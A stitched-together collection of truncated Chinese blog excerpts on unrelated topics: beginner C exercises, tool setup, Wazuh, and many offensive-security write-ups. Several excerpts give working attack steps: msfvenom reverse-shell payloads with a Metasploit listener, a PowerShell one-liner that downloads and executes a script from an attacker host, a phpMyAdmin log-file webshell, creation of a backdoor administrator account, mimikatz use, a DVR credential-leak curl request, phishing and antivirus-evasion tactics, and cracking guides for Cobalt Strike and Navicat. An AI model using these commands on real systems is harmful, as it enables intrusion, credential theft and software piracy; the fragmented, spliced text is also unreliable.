红队攻击面相关讨论

0x00 什么是红队 红队，一般是指网络实战攻防演习中的攻击一方。 红队一般会针对目标系统、人员、软件、硬件和设备同时执行的多角度、混合、对抗性的模拟攻击；通过实现系统提权、控制业务、获取数据等目标，来发现系统、技术、人员和基础架构中存在的网络安全隐患或薄弱环节。 红队人员并不是一般意义上的电脑黑客。因为黑客往往以攻破系统，获取利益为目标；而红队则是以发现系统薄弱环节，提升系统安全性为目标。此外，对于一般的黑客来说，只要发现某一种攻击方法可以有效地达成目标，通常就没有必要再去尝试其他的攻击方法和途径；但红队的目标则是要尽可能地找出系统中存在的所有安全问题，因此往往会穷尽已知的“所有”方法来完成攻击。换句话说，红队人员需要的是全面的攻防能力，而不仅仅是一两招很牛的黑客技术。 红队的工作也与业界熟知的渗透测试有所区别。渗透测试通常是按照规范技术流程对目标系统进行的安全性测试；而红队攻击一般只限定攻击范围和攻击时段，对具体的攻击方法则没有太多限制。渗透测试过程一般只要验证漏洞的存在即可，而红队攻击则要求实际获取系统权限或系统数据。此外，渗透测试一般都会明确要求禁止使用社工手段（通过对人的诱导、欺骗等方法完成攻击），而红队则可以在一定范围内使用社工手段。 还有一点必须说明:虽然实战攻防演习过程中通常不会严格限定红队的攻击手法，但所有技术的使用，目标的达成，也必须严格遵守国家相关的法律和法规。 在演习实践中，红队通常会以3人为一个战斗小组，1人为组长。组长通常是红队中综合能力最强的人，需要较强的组织意识、应变能力和丰富的实战经验。而2名组…

以下是一个单链表，包括单链表的建立，插入，查找，删除 由于刚开始接触链表，如有错误，还请谅解 此为整体框架 #include<stdio.h> #include<stdlib.h> typedef struct node { int date; struct node *next; }liklistnode; liklistnode *initialize(void);//初始化单链表 liklistnode *creat(int n);//尾插法建立单链表 liklistnode *locate(liklistnode *head,int key);//按值查找结点 liklistnode *get(liklistnode *head,int i);//按序号查找结点 void insert_After(liklistnode * Ptr,int x);//在指定位置后插入结点 void insert_Before(liklistnode *head,liklistnode *Ptr,int x);//在指定位置前插入结点 liklistnode *delete_After(liklistnode *Ptr);//删除指定结点的后续结点 liklistnode *delete_i(liklistnode *head,int i);//删除第i个结点 int main() { return 0; } liklistnode *initialize(void);//初始化单链表…

如果对哪段代码有疑问或什么不懂可以的加QQ3418208634（ 欢迎交流~） 如果觉得杂鱼灰太狼哪题讲的不好的欢迎指出，我去修改捏~ [之前134出现不可控bug,现已修复,并由godyu进行补全134-150] 域为三个月前不可控BUG的存在未成功修复抱歉,现在已经全部提交完毕. 1101: 逆序数字（函数专题） //注意：题目要求只需提交inverse函数部分即可 int inverse(int n) int m=0; //定义最终需要返回的结果，注意应赋值为0，不然m的值会随机生成 do{ int x=n%10; //把最低位提取出来 m=m*10+x; //逆序相加 n/=10; //舍弃最低位 }while(n>0); //判断是否需要继续逆序 return m; //把结果传回main函数，注意题目只需传回逆序数值，而不是相加值 } 1102: 火车票退票费计算（函数专题） double CancelFee(double price) { double change=0; //定义并把退票费初始化 double x=price*0.05; //先计算退票费用 double y=(int)(price*0.05); //保留整数部分 while(x>=1) //先把整数部分去掉看小数部分 { x--; } if(x<0.25) //尾数小于…

前言 Dev C++也是一个编程工具,配置也简单,且便捷-麻雀虽小,五脏俱全,可谓是编程必备了这边Godyu建议呢 Vscode和Devc++都下载并且使用 熟悉一下 （比赛的时候Dev c++频率出现较大） 本文章由Godyu编写,PDF图片以及操作过程由Frex提供！ 原创配置教程不懂的可以问我（为爱发电我第一个冲 下载、安装DEV-C++并进行简单设置 1.进入DEV-C++库官网，点击”DownLoad”按钮，之后会进入第二个界面，等待倒计时结束，会自动开始下载。 如果下载速度过慢或者无法进入该网页,请点击此处下载https://frexcheat.lanzoul.com/i4b2P1brn3ri 密码:h5v6 2.下载完成后，我们双击打开安装包，等待加载完毕，选择合适的安装路径，按照下面图示安装即可。 3.之后我们运行DEV-C++，会出现以下界面，在第一个界面我们选择”简体中文”，然后点击”Next”，之后会让我们 选择代码字体以及代码编辑框的主题，这里字体推荐”Cascadia Code SemiBold”，主题推荐”GSS Hacker”，之后 点击”Next”，再点击”OK”，那么我们的DEV-C++基本就设置完成了。 2.使用DEV-C++创建一个新项目并运行 1.打开DEV-C++，在左上角点击”文件-新建源代码 若如果点击运行（点击编译运行就可以直接…

0x00 概述 CobaltStrike是一款内网渗透的商业远控软件，支持自定义脚本扩展，功能非常强大。前段时间Github上有好心人放出了CobaltStrike3.12的试用版，接着Lz1y很快就放出了破解版，加上热心老哥提供了的xor64.bin（试用版中没有这个文件），一个比较完美的最新可用版本诞生了。下面我们看下最新试用版是如何被完美破解的。 0x02 上手 CobaltStrike（下面简称CS）主体代码是用Java开发的，逆起来比较友好。用jd-gui反编译cobaltstrike.jar文件，可以看到代码几乎没有做防破解。Java源码没有任何混淆。但是查看反编译的源码时，很多地方出现了// INTERNAL ERROR //，这里我推荐一款Java反编译工具luyten，几乎可以100%反编译获得cobaltstrike.jar源码。 CS的License处理逻辑在common/License.java文件中： package common; import aggressor.*; import javax.swing.*; import java.awt.*; public class License { private static long life; private static long today; private static long start; private static long difference; private static…

前言 直接放视频地址建议b站观看 https://tryhackme.com/r/room/expose sql注入+文件包含+文件上传+提权

前言 Web89 intval取整数 就跟python中的int一样 这里是只要有0-9就输出nonono 但是还需要是传出去是整数 所以我们用数组绕过 Web90 intval($var,$base)，其中var必填，base可选，这里base=0,则表示根据var开始的数字决定使用的进制： 0x或0X开头使用十六进制，0开头使用八进制，否则使用十进制。 这里是0开头 说明是根据开始的数字决定使用的进制 这里用的是八进制十六进制绕过 加0是告诉服务器这是八进制 如果转换成十六进制需要加0x Web91 不想打字了,感觉WP里给的说的好全面 i忽略大小写 m多行模式 我们只要让我们的参数里含有php即可 payload:cmd?=111%0aphp 或者cmd?=php%0aggg Web92 这里与web90的不同之处就在于等号了 ===表示类型和数值必须相等 ==是值相等就可以类型不一定相等 我们知道强制转换如果是小数部分的话会舍弃小数部分直接构造小数 Web93 不解释直接秒 Web94 查一下strpos用法 这里说明我们得含有0 但不能在开头,因为开头告诉服务器使用几进制 Web95 过滤了.八进制起手 +或者空格绕过最后一个限制 W…

1.powershell网络钓鱼脚本： https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1 2.MSF下生产一个后门文件，通过上传或者其他方式让其受害者点击 Msfvenom -p windows/meterpreter/reverse_https lhost = 192.168.1.138 lport = 4444 -f exe> /opt/bk.exe 2.通过MSF获取远程目标受害者主机的反弹shhell: msf> use multi/handler msf exploit（handler ）> set payload windows/meterpreter/reverse_https msf exploit（handler ）> set lhost 192.168.1.138 msf exploit（handler ）> set lport 4444 msf exploit（handler ）> exploit 3.powershel远程下载并执行： powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/enigma0x3/Invoke-LoginProm…

获取phpmyadmin弱口令 通过信息收集到彩票站点的ip为xxx，探测扫描发现存在phpmyadmin，通过猜测，使用默认弱口令(root/root)登入到phpmyadmin当中。 通过phpmyadmin后台sql查询写入shell到日志文件 使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。 流程和命令如下: 1、开启日志功能：set global general_log=on; 2、点击phpmyadmin变量查看日志文件名字: 这里的日志文件是test.php。 3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>'; 4、执行成功返回。 5、查看日志文件。 6、菜刀连接添加用户并且上传mimikatz。 使用菜刀连接日志文件木马，xxx/test.php 密码:test 查看发现是系统管理员sysytem权限，直接添加用户且添加到管理组即可。 命令为: C:\Windows\system32\net.exe user Test Test!@#123 /add C:\Windows\system32\net.exe localgroup administrators Test /add 上传mimikataz到服务器当中。 7、3389连接，读取管理员密码。 （1）、直接telnet ip 3389 测试发现可通，于是直接连接3389进去。 （2）、或者这里在菜刀上执行以下命令查询3389开放的端口…

0x00 前言 本文主要介绍一下MSF模块的下载、使用，以及当攻击机处于内网，而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下，并没有新的知识点，可以为刚入门的新手抛砖引玉，提供一条解决问题的思路，同时也记录一下过程，加强记忆。 主要分为两个知识点，一是SMB漏洞的批量检测，二是内网穿透技术。 首先是环境的搭建，具体如下表所示： 主机IP备注 Kali 64位 192.168.232.134 攻击机 Windows XP 32位 192.168.232.128 安装了python2.6，下载有方程式利用工具包（主要为Windows目录下的工具） Window2008 R2 64位 10.50.2.62 靶机，存在MS17-010漏洞，并可以访问外网 0x01 SMB漏洞批量检测 1.扫描脚本的下载和加载 由于Metasploit还没有更新MS17-010检测的模块，所以要去exploit-db下载，并在MSF中加载。 root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb …

一、信息收集拿到目标网站，可见是一个很常规的bc站。 先进行简单的信息收集，通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息 命令行nslookup+url查看ip,发现没有CDN 再到爱站上看看 嗯，柬埔寨可还行 知道ip地址后端口扫描一波（全端口扫描+服务探测。这个过程比较漫长，可以先干别的） 在扫描之余尝试3389连接远程桌面（因为开始已经看到是windows serve的服务器） 试了两次，猜测是修改端口了，或者是登录ip白名单？ 二、后台爆破回到web，反手在url后面加一个admin 后台出来了，这bc有点水啊，随手测了几个弱口令，无果 发现没有验证码校验，抓包爆破一波 通常找一些常规的弱口令进行爆破就够了 秒出密码：123456，我吐了，他们运维可能要被打死 三、寻找上传点这么简单就拿下了后台，我们当然不会满足。 大致浏览了一下后台的各个功能，寻找可以利用的地方，在系统管理处找到一处上传点 （有没有表哥发收款码过来，暴富的机会来了！） 随便写一个一句话，并将后缀改成.jpg并且抓包发送到Repeater查看 提示“不是真正的图片类型” ，在包内改成php后缀，提示非法文件类型 感觉是白名单+文件头校验，尝试图片马 尝试了几波，白名单限制得很死，没绕过去 顿时陷入了僵局，还是另外寻找突破口吧 四、峰回路转认真想了一下，它是Windows，而Windows的主流建站工具，宝塔，护卫神，phpstudy，upupw。之前看到它的php版本是5.2.17，正好想到前段时间爆出的phpstu…

0x00 漏洞简介Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530)，在使用某些tag等情况下可能存在OGNL表达式注入漏洞，从而造成远程代码执行，风险极大。0x01 漏洞描述Struts2 会对某些标签属性(比如 `id`，其他属性有待寻找) 的属性值进行二次表达式解析，因此当这些标签属性中使用了 `%{x}` 且 `x` 的值用户可控时，用户再传入一个 `%{payload}` 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。0x02 漏洞影响struts 2.0.0 - struts 2.5.250x03 漏洞复现一.环境搭建1.docker环境地址：https://github.com/vulhub/vulhub/tree/master/struts2/s2-061docker-compose up -d #启动docker环境2.访问目标地址 http://192.168.1.14:8080/index.action 二、漏洞利用1.DNSlog验证漏洞 POST /index.action HTTP/1.1Host: 192.168.1.14:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows N…

前言 房间地址：https://tryhackme.com/room/hackpark 使用 Hydra 暴力破解网站登录，识别并使用公共漏洞，然后升级您在此 Windows 计算机上的权限！ 建站不一定需要linux(实际上市场上大部分都是linux,本次要打的靶场是用win建站,我们通过的网站漏洞打进Windows主机 看到是人入侵Windows 使用到了MSF，看经典好像是当年的永恒之蓝漏洞 实战 靶机地址：10.10.201.235 Hackpark的引入 小丑回魂里的,我虽然没看过这个电影,但是刷过片段,还行,这里只是一个小丑,其实我也是小丑 有个联系,预测可能有XSS注入, 这里有个登录,那就是爆破了 我们看下 第一题： 九头蛇爆破账号密码 让后看第二题 Hydra 确实有很多功能，并且有许多可用的“模块”（模块的一个示例是我们上面使用的http-post-form ）。 然而，这个工具不仅适用于暴力破解 HTTP 表单，还适用于其他协议，如 FTP、SSH、SMTP、SMB 等。 下面是一个迷你备忘单： 命令描述Hydra -P <单词列表> -v <ip> <协议>对您选择的协议进行暴力破解Hydra -v -V -u -L <用户名列表> -P <密码列表> -t 1…

前言 Navicat可能是Mysql必备的工具了,不过域还是建议具备一些网站开发经验才能更好的学习. 其次今天不发Thm靶场,水一下文章 发一些之前用的工具的破解教程(抱歉 介绍一下Navicat Navicat Premium 是一套可创建多个连接的数据库开发工具，让你从单一应用程序中同时连接 MySQL、Redis、MariaDB、MongoDB、SQL Server、Oracle、PostgreSQL 和 SQLite 。它与 GaussDB 、OceanBase 数据库及 Amazon RDS、Amazon Aurora、Amazon Redshift、Amazon ElastiCache、Microsoft Azure、Oracle Cloud、MongoDB Atlas、Redis Enterprise Cloud、阿里云、腾讯云和华为云等云数据库兼容。你可以快速轻松地创建、管理和维护数据库。 但是Navicat是需要破解的,不然只能用14天接下来教大家如何破解 破解激活教程 先在官方下载Navicat Navicat | 下载 Navicat Premium 14 天免费 Windows、macOS 和 Linux 的试用版 破解软件下载地址NavicatCracker.exe_免费高速下载|百度网盘-分享无限制 (baidu.com) 破解思路： 把破解软件放到Navicat文件夹中 让后关闭防火墙和网络 全…

简述 钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集 批量邮箱搜集 https://app.snov.io/ http://www.skymem.info/ 搜索引擎 一般来说，企业邮箱都存在邮件网关，邮件投递容易被退信拦截，所以我们要选择私人邮箱或不被邮服拦截的邮箱： 如 xx举报，xx招聘面对大众的邮箱，相关语法： site:"xxx.com" 举报 site:"xxx.com" 招聘 xx公司举报 @126.com xx公司招聘 @qq.com 钓鱼手法 社工钓鱼 首先是目标选择，目标群体：hr、经理、财务 等安全意识薄弱的人优先选择，提前准备多套场景应对 选择目标公司分部进行钓鱼成功率较高，提前想好话术和应变对策，避免被识破，最好不要在总部，避开IT信息安全部 社牛的师傅可以尝试电话钓鱼，获取信任再添加微信发送木马（需要过人的心理素质和应变能力，之前从潘高工身上学到很多） 邮件钓鱼 群发邮件（不推荐，易被管理员发现或被邮件网关拦截） 搜集关键人物个人邮箱定向投递（推荐，隐蔽性强） 福利补贴发放 紧贴时事话题，使用各种福利活动吸引目标用户点击，把钓鱼链接转为二维码发送 简历投递 招聘投递简历，hr面对大量简历不会仔细查看后缀 钓鱼…

巡风简介 巡风是一款适用于企业内网的漏洞快速应急、巡航扫描系统，通过搜索功能可清晰的了解内部网络资产分布情况，并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。其主体分为两部分：网络资产识别引擎与漏洞检测引擎。 网络资产识别引擎会通过用户配置的IP范围定期自动的进行端口探测（支持调用MASSCAN），并进行指纹识别，识别内容包括：服务类型、组件容器、脚本语言、CMS。 漏洞检测引擎会根据用户指定的任务规则进行定期或者一次性的漏洞检测，其支持2种插件类型、标示符与脚本，均可通过web控制台进行添加。（转自https://github.com/ysrc/xunfeng） 安装Ubuntu就不说了，说下国内的比较快的源吧，省的网速不好，只能干等 Ubuntu 17.04的开发代号是Zesty Zapus，以下是Ubuntu 17.04网易源： sudo nano /etc/apt/source.list deb http://mirrors.163.com/ubuntu/ zesty main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-security main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-updates main restricted universe multiverse deb http://mi…

1. 根据网卡获取的网段信息，对win7所在网段来一波存活主机检测，排除其他的之后目标锁定在主机号为128的主机上2. 对发现的存活主机来一波整体信息收集发现开了以下的端口，并且是一个域用户┌──(root💀kali)-[/]└─# nmap -A 192.168.164.128 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CSTNmap scan report for 192.168.164.128Host is up (0.00052s latency).Not shown: 989 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45|_http-title: Site doesn't have a title (text/html).135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Wi…

一、导入mysql数据前期设置 1.建库和表统一编码设置为UTF8，根据数据中的编码来修改（也可以将数据全部转换为utf-8格式，小文件可用notepad来修改编码，大文件可用 LogViewPro 来修改编码） 2.对MySql数据库进行优化配置 my.ini优化配置： [mysql] default-character-set=utf8 [mysqld] port=3306 basedir=F:/phpstudy_pro/Extensions/MySQL5.7.26/ datadir=F:/phpstudy_pro/Extensions/MySQL5.7.26/data/ character-set-server=utf8 #默认的数据库编码 default-storage-engine=MyIsam #数据库引擎，myisam适合于查询 max_connections=1000 #客户端和服务器最大连接数，默认为1000 collation-server=utf8_unicode_ci init_connect='SET NAMES utf8' innodb_buffer_pool_size=4096M #一般设置 buffer pool 大小为总内存的 3/4 至 4/5 innodb_flush_log_at_trx_commit=2 #当设置为2，该模式速度较快，也比0安全，只有在操作系统崩溃或者系统断电的情况下，上一秒钟所有事务数据才可能丢失。 inn…

代理生命周期 注册代理 一旦代理程序安装在要监控的计算机上，就必须向Wazuh管理器注册才能建立通信。这可以通过命令行，Authd或RESTful API完成。 注册代理将保留在管理器中，直到用户将其删除。在任何给定时间内，代理可能有四种不同的状态，如下图所示： 代理状态 从未连接：代理已注册但尚未连接到管理器。 待定 身份验证过程正在等待：管理服务器已收到来自代理的连接请求，但尚未收到任何其他内容。这可能表示防火墙问题。代理将在其连接生命周期中处于此状态一次。 活动：代理已成功连接，现在可以与管理器通信。 已断开连接：如果代理在半小时内未收到来自代理的任何消息，则管理员将认为代理已断开连接。 删除代理 从agent主机的管理器中删除代理程序后，连接生命周期即将结束。这可以通过RESTful API，命令行或Authd完成（如果启用了force选项）。 强制插入 如果您尝试添加具有已注册到其他代理的IP地址的代理，该manage_agents命令将返回错误。您仍然可以使用-F选项强制添加。 列如： 安装了名为Server1的IP 10.0.0.10 的代理，并且ID为005.如果我们假设必须重新安装服务器，则必须重新安装新的代理并将其连接到管理器。在这种情况下，我们可以使用参数-F 0，这意味着将删除先前的代理（005）（使用备份），并且将使用IP重新创建新代理。新代理将具有新ID： /var/ossec/bin/manage_agents -n Server1 -a 10.10.10.10 -F …

对于代码的疑问和改进欢迎交流和讨论，QQ：3153233088 后续注释会有的 1051: 平方根的和 这里介绍两种开平方根的方法，都需要用到头文件<math.h> 1.sqrt函数，专门开平方根的函数 2.pow函数，这是一个求任意次方的函数，可以用pow(n,0.5)来求n的平方根。 #include <stdio.h> #include <math.h> int main() { int i,n; double sum=0,item; scanf("%lf %d",&item,&n); //下循环在求item的同时进行累加 for(i=1;i<=n;i++) { sum=item+sum; item=sqrt(item);//把item定义为double就是防止开根后小数的损失 } printf("%.2lf",sum); return 0; } 1052: 数列求和4 两种方法在于对各项的理解和求法 #include<stdio.h> int main() { int n,a,sum=0,x=0;//sum代表和，x为项的值 scanf("%d%d",&n,&a); for(int i=1;i<=n;i++) { x=x*10+a;//从第二项开始，每一项就等于前…

0x01 ipc$的定义 IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 0x02 ipc$与空连接,139,445端口,默认共享的关系 ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). ipc$与139,445端口: ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭…

0x00 前言 闲着无聊，网上随便找了一个菠菜进行简单测试，并做笔记记录，大佬们轻喷，有什么不足之处请指教。 0x01 弱口令访问网站就是一个登录页面，没有验证码直接bp开启，成功爆出弱口令admin/123456，直接进入后台。 0x02 注入拿下权限翻看了很多功能点，在一处功能点发现上传接口，并尝试上传文件，发现无法上传，加了白名单。直接选择放弃，继续寻找。在某一个http://url/GroupMember.aspx?gid= 参数上加上单引号，直接报错，SQL注入这不就来了么。 说干就干，直接SQLMAP。 发现为MSSQL，且DBA权限，直接--os-shell 上线MSF 已经获取普通权限，接下来就是上线msf提权。msf生成powershell脚本，并放置在网站目录下。 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1 Vps开启监听 使用powershell上线session powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))" 如果想要通过url拼接堆叠执行powershell会存在一个问题，就是单引号闭合问题。我们可以通过对powershell进行编码一下，这样就可以绕过单引号的问题。下面推…

0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞 util ,最后好像没用到 检查程序，发现apache的common−collections4,而且其反序列化利用类未被Patch 一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打 考点发现就是 cc4 附上文章 外加spring−ech 网上有现成的 poc 造轮子！ : package moe.orangemc; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import javassist.ClassPool; import javassist.CtClass; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.…

###漏洞描述 此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板，返回此设备的明文管理员凭证。 ###漏洞利用 1.利用代码 curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" 2.poc利用 https://github.com/ezelf/CVE-2018-9995_dvr_credentials git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git cd CVE-2018-9995_dvr_credentials pip install -r requirements.txt ###关键词搜索 1. zoomeye: keyword: “/login.rsp" 2.shodan: keyword:html:"/login.rsp" keyword:"server:GNU rsp/1.0" 3.google: keyword:intitle:"DVR login" ###批量验证 DVR系列摄像头批量检测 使用方法:python CVE-2018-9995_check.py host.txt 其中host.txt内容可以为8.8.8.8:8080或者www.baidu.com，脚…

0x01前言 在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞，该漏洞攻击者无需身份验证登录即可远程执行任意代码。cisco Smart Install是一种“即插即用”的配置和图像管理功能，可为新的交换机提供简易的部署。该功能允许用户将思科交换机放置到到任何位置，将其安装到网络中，然后启动，无需其他配置要求。因此它可以完全控制易受攻击的网络设备。Smart Install是一种即插即用的配置和图像管理的功能，为新型交换机提供良好的图形界面管理。它能使初始化配置过程自动化，并通过当前加载操作系统的镜像提供新的交换机。该功能还可在配置发生变化的时候提供热插热拔的实时备份。需要注意的是，该功能在默认情况下客户端上是启用了的。 0x02漏洞描述 思科 IOS 和 IOS-XE 系统 Smart Install Client 代码中存在一处缓冲区栈溢出漏洞（CVE-2018-0171）。攻击者可以远程向 TCP 4786 端口发送一个恶意数据包，利用该漏洞，触发目标设备的栈溢出漏洞造成设备拒绝服务（DoS）或在造成远程命令执行，攻击者可以远程控制受到漏洞影响的网络设备。据悉，思科交换器 TCP 4786 端口是默认开放的 0x03检查漏洞 1.如果您的思科网络设备开放了TCP 4786端口，则易受到攻击，为了找到这样的设备，只需通过nmap扫描目标网络。 nmap -p T:4786 192.168.1.0/24 2.要检查网络设备是否开放了Smart Install Client客户端功能，以下示例…